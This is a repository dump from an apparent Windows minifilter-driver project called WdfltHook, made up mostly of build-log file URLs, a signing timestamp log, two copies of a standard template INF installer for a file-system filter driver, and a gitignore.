https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.7112.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.7112.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.7112.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8152.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8152.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8152.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8152.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8376.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8376.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8376.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8376.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8756.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8756.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8756.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.8756.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9316.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9316.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9316.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9316.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9328.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9328.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9328.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9328.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9368.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9368.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9368.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9368.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9388.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9388.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9388.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9388.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9552.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9552.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9552.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9552.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9576.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9576.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9576.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9576.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9608.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9608.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9608.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9608.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9632.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9632.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9632.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9632.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9636.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9636.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9636.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9636.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9752.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9752.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9752.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.9752.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/rc.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/rc.command.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/rc.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/rc.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/rc.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/rc.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.command.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.timestamp.1.tlog: -------------------------------------------------------------------------------- 1 | C:\USERS\DORGE\SOURCE\REPOS\WDFLTHOOK\X64\RELEASE\WDFLTHOOK.SYS|638343802137431690 2 | C:\USERS\DORGE\SOURCE\REPOS\WDFLTHOOK\X64\RELEASE\WDFLTHOOK\WDFLTHOOK.CAT|638343802161681781 3 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/signtool.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/stampinf.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/stampinf.command.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/stampinf.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/stampinf.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/stampinf.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/stampinf.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/vc142.pdb -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/x64/Release/WdfltHook.cer -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook.inf: -------------------------------------------------------------------------------- 1 | ;;; 2 | ;;; WdfltHook 3 | ;;; 4 | 5 | [Version] 6 | Signature = "$Windows NT$" 7 | ; TODO - Change the Class and ClassGuid to match the Load Order Group value, see https://msdn.microsoft.com/en-us/windows/hardware/gg462963 8 | ; Class = "ActivityMonitor" ;This is determined by the work this filter driver does 9 | ; ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Load Order Group value 10 | Class = "ActivityMonitor" 11 | ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} 12 | Provider = "Template" 13 | DriverVer = 10/31/2023,22.16.51.732 14 | CatalogFile = WdfltHook.cat 15 | PnpLockDown=1 16 | 17 | [DestinationDirs] 18 | DefaultDestDir = 12 19 | MiniFilter.DriverFiles = 12 ;%windir%\system32\drivers 20 | 21 | ;; 22 | ;; Default install sections 23 | ;; 24 | 25 | [DefaultInstall] 26 | OptionDesc = %ServiceDescription% 27 | CopyFiles = MiniFilter.DriverFiles 28 | 29 | [DefaultInstall.Services] 30 | AddService = %ServiceName%,,MiniFilter.Service 31 | 32 | ;; 33 | ;; Default uninstall sections 34 | ;; 35 | 36 | [DefaultUninstall] 37 | DelFiles = MiniFilter.DriverFiles 38 | 39 | [DefaultUninstall.Services] 40 | DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting 41 | 42 | ; 43 | ; Services Section 44 | ; 45 | 46 | [MiniFilter.Service] 47 | DisplayName = %ServiceName% 48 | Description = %ServiceDescription% 49 | ServiceBinary = %12%\%DriverName%.sys ;%windir%\system32\drivers\ 50 | Dependencies = "FltMgr" 51 | ServiceType = 2 ;SERVICE_FILE_SYSTEM_DRIVER 52 | StartType = 3 ;SERVICE_DEMAND_START 53 | ErrorControl = 1 ;SERVICE_ERROR_NORMAL 54 | ; TODO - Change the Load Order Group value 55 | ; LoadOrderGroup = "FSFilter Activity Monitor" 56 | LoadOrderGroup = "FSFilter Activity Monitor" 57 | AddReg = MiniFilter.AddRegistry 58 | 59 | ; 60 | ; Registry Modifications 61 | ; 62 | 63 | [MiniFilter.AddRegistry] 64 | HKR,,"DebugFlags",0x00010001 ,0x0 65 | HKR,,"SupportedFeatures",0x00010001,0x3 66 | HKR,"Instances","DefaultInstance",0x00000000,%DefaultInstance% 67 | HKR,"Instances\"%Instance1.Name%,"Altitude",0x00000000,%Instance1.Altitude% 68 | HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,%Instance1.Flags% 69 | 70 | ; 71 | ; Copy Files 72 | ; 73 | 74 | [MiniFilter.DriverFiles] 75 | %DriverName%.sys 76 | 77 | [SourceDisksFiles] 78 | WdfltHook.sys = 1,, 79 | 80 | [SourceDisksNames] 81 | 1 = %DiskId1%,,, 82 | 83 | ;; 84 | ;; String Section 85 | ;; 86 | 87 | [Strings] 88 | ServiceDescription = "WdfltHook Mini-Filter Driver" 89 | ServiceName = "WdfltHook" 90 | DriverName = "WdfltHook" 91 | DiskId1 = "WdfltHook Device Installation Disk" 92 | 93 | ;Instances specific information. 94 | DefaultInstance = "WdfltHook Instance" 95 | Instance1.Name = "WdfltHook Instance" 96 | ; TODO - Change the altitude value, see https://msdn.microsoft.com/en-us/windows/hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers 97 | Instance1.Altitude = "370030" 98 | Instance1.Flags = 0x0 ; Allow all attachments 99 | -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/x64/Release/WdfltHook.pdb -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/x64/Release/WdfltHook.sys -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook/WdfltHook.inf: -------------------------------------------------------------------------------- 1 | ;;; 2 | ;;; WdfltHook 3 | ;;; 4 | 5 | [Version] 6 | Signature = "$Windows NT$" 7 | ; TODO - Change the Class and ClassGuid to match the Load Order Group value, see https://msdn.microsoft.com/en-us/windows/hardware/gg462963 8 | ; Class = "ActivityMonitor" ;This is determined by the work this filter driver does 9 | ; ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Load Order Group value 10 | Class = "ActivityMonitor" 11 | ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} 12 | Provider = "Template" 13 | DriverVer = 10/31/2023,22.16.51.732 14 | CatalogFile = WdfltHook.cat 15 | PnpLockDown=1 16 | 17 | [DestinationDirs] 18 | DefaultDestDir = 12 19 | MiniFilter.DriverFiles = 12 ;%windir%\system32\drivers 20 | 21 | ;; 22 | ;; Default install sections 23 | ;; 24 | 25 | [DefaultInstall] 26 | OptionDesc = %ServiceDescription% 27 | CopyFiles = MiniFilter.DriverFiles 28 | 29 | [DefaultInstall.Services] 30 | AddService = %ServiceName%,,MiniFilter.Service 31 | 32 | ;; 33 | ;; Default uninstall sections 34 | ;; 35 | 36 | [DefaultUninstall] 37 | DelFiles = MiniFilter.DriverFiles 38 | 39 | [DefaultUninstall.Services] 40 | DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting 41 | 42 | ; 43 | ; Services Section 44 | ; 45 | 46 | [MiniFilter.Service] 47 | DisplayName = %ServiceName% 48 | Description = %ServiceDescription% 49 | ServiceBinary = %12%\%DriverName%.sys ;%windir%\system32\drivers\ 50 | Dependencies = "FltMgr" 51 | ServiceType = 2 ;SERVICE_FILE_SYSTEM_DRIVER 52 | StartType = 3 ;SERVICE_DEMAND_START 53 | ErrorControl = 1 ;SERVICE_ERROR_NORMAL 54 | ; TODO - Change the Load Order Group value 55 | ; LoadOrderGroup = "FSFilter Activity Monitor" 56 | LoadOrderGroup = "FSFilter Activity Monitor" 57 | AddReg = MiniFilter.AddRegistry 58 | 59 | ; 60 | ; Registry Modifications 61 | ; 62 | 63 | [MiniFilter.AddRegistry] 64 | HKR,,"DebugFlags",0x00010001 ,0x0 65 | HKR,,"SupportedFeatures",0x00010001,0x3 66 | HKR,"Instances","DefaultInstance",0x00000000,%DefaultInstance% 67 | HKR,"Instances\"%Instance1.Name%,"Altitude",0x00000000,%Instance1.Altitude% 68 | HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,%Instance1.Flags% 69 | 70 | ; 71 | ; Copy Files 72 | ; 73 | 74 | [MiniFilter.DriverFiles] 75 | %DriverName%.sys 76 | 77 | [SourceDisksFiles] 78 | WdfltHook.sys = 1,, 79 | 80 | [SourceDisksNames] 81 | 1 = %DiskId1%,,, 82 | 83 | ;; 84 | ;; String Section 85 | ;; 86 | 87 | [Strings] 88 | ServiceDescription = "WdfltHook Mini-Filter Driver" 89 | ServiceName = "WdfltHook" 90 | DriverName = "WdfltHook" 91 | DiskId1 = "WdfltHook Device Installation Disk" 92 | 93 | ;Instances specific information. 94 | DefaultInstance = "WdfltHook Instance" 95 | Instance1.Name = "WdfltHook Instance" 96 | ; TODO - Change the altitude value, see https://msdn.microsoft.com/en-us/windows/hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers 97 | Instance1.Altitude = "370030" 98 | Instance1.Flags = 0x0 ; Allow all attachments 99 | -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook/WdfltHook.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/x64/Release/WdfltHook/WdfltHook.sys -------------------------------------------------------------------------------- /WdfltHook/x64/Release/WdfltHook/wdflthook.cat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/x64/Release/WdfltHook/wdflthook.cat -------------------------------------------------------------------------------- /gitignore.txt: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Compiled Object files 5 | *.slo 6 | *.lo 7 | *.o 8 | *.obj 9 | 10 | # Precompiled Headers 11 | *.gch 12 | *.pch 13 | 14 | # Compiled Dynamic libraries 15 | *.so 16 | *.dylib 17 | *.dll 18 | 19 | # Fortran module files 20 | *.mod 21 | *.smod 22 | 23 | # Compiled Static libraries 24 | *.lai 25 | *.la 26 | *.a 27 | *.lib 28 | 29 | # Executables 30 | *.exe 31 | *.out 32 | *.app 33 | --------------------------------------------------------------------------------